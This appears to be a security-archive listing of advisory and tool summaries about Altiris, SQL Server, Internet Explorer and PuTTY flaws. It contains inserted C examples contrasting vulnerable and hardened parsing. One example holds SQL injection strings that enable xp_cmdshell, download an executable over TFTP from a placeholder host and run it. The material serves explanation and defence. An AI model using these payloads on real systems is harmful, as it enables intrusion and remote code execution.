This Metasploit module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8 to 6.9.164. The vulnerability exists in axengine.exe, which fails to adequately sanitize numeric input fields in "UpdateComputer" notification requests. In order to spawn a shell, several SQL injections are required in close succession: first to enable xp_cmdshell, then to retrieve the payload via TFTP, and finally to execute it. The module also has the capability to disable or enable local application authentication. For the module to work, the target system must have a TFTP client available.
0e3a942ab280498a695c23461a8d0a229e06c84edd64ed4f0b821529fe187516
Whitepaper explaining how an exposed phpinfo() page can be used to assist with the exploitation of LFI vulnerabilities in PHP when combined with the file upload handling feature that is enabled by default.
92bd4aa1033b11a08dc24bd0ba5f07564ee1566f2fbf0f928b88447e2d7d2b8a
Insomnia Security Vulnerability Advisory - A flaw exists in the handling of malformed URLs passed through the ShellExecute() API in Microsoft Windows. The vulnerability does not directly cause an issue within Windows itself; however, applications that call the flawed API may be vulnerable to various attacks, one of which is shown in this report.
39f5ed63255f91f74bafeb10491b25db0ff238ff227c677e96fd690e0beceae1
Insomnia Security Vulnerability Advisory - A vulnerability was found in the way that WebDAV requests are cached and then later retrieved by Internet Explorer. This results in the use of uninitialized memory, which under the right circumstances can lead to command execution.
0ebee2503764c3f44cce43818618fb05a3255230042be4a70fb22d4b93f6b573
Insomnia Security Vulnerability Advisory - The Altiris Deployment Server Agent in Altiris Deployment Server 6.X suffers from a privilege escalation vulnerability.
ad4df9326b88cc8114e907561c055aaa21aa5a4cccfa765a54aeb3b200530a40
Insomnia Security Vulnerability Advisory - Microsoft Office OneNote suffers from a URL handling vulnerability.
cd5c05fc129fad5e01ad13fafee248da86bca40d183785e3fddc3dc796468b18
PuttyHijack is a proof of concept tool that injects a DLL into the PuTTY process to hijack an existing, or soon to be created, connection. This can be useful during penetration tests when a compromised Windows box is used to SSH/Telnet into other servers. The injected DLL installs some hooks and creates a socket for a callback connection that is then used for input/output redirection. It does not kill the current connection, and will cleanly uninject if the socket or process is stopped.
76638a2bf29bf449a398893790d01602a562f5a3b12f15a2683f50a4e6412ef4
Insomnia Security Vulnerability Advisory - Microsoft SQL Server contains a buffer overflow that can be reached by causing the server to attempt a database restore from a corrupt backup file.
5a50603e65e5b46c0ff831ce59e84e01f0f7a9d8c6723e48eb9d86453a08b703
iDefense Security Advisory 07.08.08 - Remote exploitation of an integer underflow vulnerability within Microsoft Corp.'s SQL Server could allow a remote attacker to execute arbitrary code with the privileges of the SQL Server. The vulnerability exists within the code responsible for parsing a stored backup file. A 32-bit integer value, representing the size of a record, is taken from the file and used to calculate the number of bytes to read into a heap buffer. This calculation can underflow, which leads to insufficient memory being allocated. The buffer is subsequently overfilled leading to an exploitable condition. iDefense confirmed the existence of this vulnerability in Microsoft SQL Server 2005 Service Pack 2 Hot Fix 4. Additional tests against SQL Server 2005 without any updates suggest it is also vulnerable. Previous versions are also suspected to be vulnerable.
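The length calculation described in the iDefense advisory above, as an added example (constructed here; not iDefense's code and not the real SQL Server backup format). A toy record starts with a 4-byte little-endian size field and a 4-byte type tag; the vulnerable path allocates `size` bytes but computes the body length as `size - header` in unsigned 32-bit arithmetic, so a size smaller than the header wraps to a value near 4 GiB. The vulnerable function returns the lengths it would have used rather than performing the copy, so the condition can be observed without crashing; the hardened parser rejects sizes that would underflow or exceed the data on hand.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed record layout (assumption, not the MSSQL backup format):
 * [u32 size][u32 type][body ...], size covers the whole record. */
#define RECORD_HDR_LEN 8u

static uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Vulnerable arithmetic: alloc_len is what the parser would allocate,
 * copy_len is how many body bytes it would then read into that buffer.
 * When size < RECORD_HDR_LEN the subtraction wraps, so copy_len is far
 * larger than alloc_len and the heap buffer would be overfilled. */
int body_len_vulnerable(const uint8_t *rec, size_t reclen,
                        uint32_t *alloc_len, uint32_t *copy_len)
{
    if (reclen < RECORD_HDR_LEN)
        return -1;
    uint32_t size = read_le32(rec);
    *alloc_len = size;                    /* buffer sized from the field  */
    *copy_len = size - RECORD_HDR_LEN;    /* underflows for size < 8      */
    return 0;
}

/* Hardened: validate the declared size against both the header length and
 * the bytes actually present, then copy with a bounded length. */
int parse_record_fixed(const uint8_t *rec, size_t reclen,
                       uint8_t *body, size_t body_cap, uint32_t *body_len)
{
    if (reclen < RECORD_HDR_LEN)
        return -1;
    uint32_t size = read_le32(rec);
    if (size < RECORD_HDR_LEN)   /* would underflow */
        return -1;
    if (size > reclen)           /* claims more data than we hold */
        return -1;
    uint32_t n = size - RECORD_HDR_LEN;
    if (n > body_cap)            /* does not fit the caller's buffer */
        return -1;
    memcpy(body, rec + RECORD_HDR_LEN, n);
    *body_len = n;
    return 0;
}

int main(void)
{
    /* constructed record claiming a size of 4, smaller than its own header */
    uint8_t rec[RECORD_HDR_LEN] = { 4, 0, 0, 0, 0, 0, 0, 0 };
    uint32_t alloc_len = 0, copy_len = 0;
    body_len_vulnerable(rec, sizeof rec, &alloc_len, &copy_len);
    printf("vulnerable: allocates %u bytes, copies %u bytes\n",
           alloc_len, copy_len);

    uint8_t body[16];
    uint32_t n = 0;
    int rc = parse_record_fixed(rec, sizeof rec, body, sizeof body, &n);
    printf("hardened: %s\n", rc == 0 ? "accepted" : "rejected");
    return 0;
}
```

The check that matters is the one against `reclen`: an upper bound alone would still let a size of 0 through, and a lower bound alone would still let a large size read past the end of the file.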
fe9c3148cb2d757ad46ba64750e372614bfc507af907dfccd2670469cfd270b0
Insomnia Security Vulnerability Advisory - Altiris Deployment Solution listens for connections from the Altiris client on port 402. It is possible to make a request to this port that will result in the encrypted domain credentials being returned. Versions 6.8.x and 6.9.x are affected.
234df1762e5efb593ef96dd70a17ec44fe21692085b54ea3770decbd5d36aeb3
Insomnia Security Vulnerability Advisory - Altiris Deployment Solution listens for connections from the Altiris client on port 402. It is possible to make a request that will result in the exploitation of a SQL injection vulnerability. This leads to database access under the context of the Deployment Server, which typically then allows command execution under the context of the SQL Server. Versions 6.8.x and 6.9.x are affected.
326d2fd0343a50acde785461329cd29f99ec31a55cf0fdeda6e4172d09fb8bbf
A vulnerability allows attackers to remotely obtain domain credentials on vulnerable installations of Symantec Altiris Deployment Solution. User interaction is not required to exploit this vulnerability. Authentication is not required to exploit this vulnerability. The specific flaw exists within the axengine.exe service listening by default on TCP port 402. The service allows a remote client to request encrypted domain credentials without authentication. The encryption lacks a salt, allowing an attacker with a local installation of Altiris Deployment Solution to easily decrypt the credentials.
7c57c51d7eb9485092b9733dd77580432e2148547cf273f9c09f17ffd9ef013f
A vulnerability allows attackers to execute arbitrary code on vulnerable installations of Symantec Altiris Deployment Solution. User interaction is not required to exploit this vulnerability. The specific flaw exists within the axengine.exe process listening by default on TCP port 402. A lack of proper sanitization while parsing requests allows a remote attacker to inject arbitrary SQL statements into the database. Exploitation of this vulnerability can result in arbitrary code execution under the context of the SYSTEM user.
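The numeric-field injection and the xp_cmdshell/TFTP chain described in the Metasploit module entry and the two axengine.exe advisories above, as an added example (constructed here; not the module's code, not Altiris' schema, and not the wire format of the port 402 protocol). The table and column names, the host 192.0.2.10 and the file name p.exe are placeholders. The vulnerable builder pastes the field straight into the statement, so a value beginning with a digit and continuing with stacked statements is accepted; the hardened builder admits only a bounded run of digits, which is the only thing a numeric field should ever carry.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* The three injections the module description sends in succession, each
 * smuggled through a numeric field. Host and file names are placeholders. */
const char *INJECT_ENABLE_XP_CMDSHELL =
    "1; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; "
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --";
const char *INJECT_FETCH_PAYLOAD =
    "1; EXEC master..xp_cmdshell 'tftp -i 192.0.2.10 GET p.exe c:\\p.exe'; --";
const char *INJECT_RUN_PAYLOAD =
    "1; EXEC master..xp_cmdshell 'c:\\p.exe'; --";

/* Vulnerable: the computer id from the request is formatted directly into
 * the SQL text. Table/column names are hypothetical. */
int build_update_vulnerable(const char *computer_id, char *out, size_t outlen)
{
    int n = snprintf(out, outlen,
                     "UPDATE computer SET last_seen = GETDATE() "
                     "WHERE computer_id = %s", computer_id);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* What a numeric field must satisfy: non-empty, digits only, and short
 * enough to fit a 32-bit identifier (10 decimal digits). */
int is_numeric_field(const char *s)
{
    size_t len = strlen(s);
    if (len == 0 || len > 10)
        return 0;
    for (size_t i = 0; i < len; i++)
        if (!isdigit((unsigned char)s[i]))
            return 0;
    return 1;
}

/* Hardened: refuse anything that is not a plain integer before it gets
 * anywhere near the statement. (A parameterized query is the real fix;
 * the validation is the minimum that blocks stacked statements here.) */
int build_update_hardened(const char *computer_id, char *out, size_t outlen)
{
    if (!is_numeric_field(computer_id))
        return -1;
    return build_update_vulnerable(computer_id, out, outlen);
}

int main(void)
{
    char q[512];
    const char *steps[] = { INJECT_ENABLE_XP_CMDSHELL, INJECT_FETCH_PAYLOAD,
                            INJECT_RUN_PAYLOAD };
    for (int i = 0; i < 3; i++) {
        build_update_vulnerable(steps[i], q, sizeof q);
        printf("vulnerable step %d: %s\n", i + 1, q);
        printf("hardened step %d:  %s\n", i + 1,
               build_update_hardened(steps[i], q, sizeof q) == 0
                   ? "accepted" : "rejected");
    }
    return 0;
}
```

Note that each injected value still starts with a valid id, so a check that only parses a leading integer (atoi-style) would pass all three; the validator has to reject the trailing characters, not just find a number at the front.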
148cb7d61bc722442ed25c93f163d9d66beaac36d1c62b2941df3e85f1a14b9d
Access Through Access - A whitepaper that aggregates material on how to abuse Microsoft Access during a penetration test.
acaaf07911fd3af0f81cc2e11aac7c5e782cc6b509d97994fcf2f209c11ba94e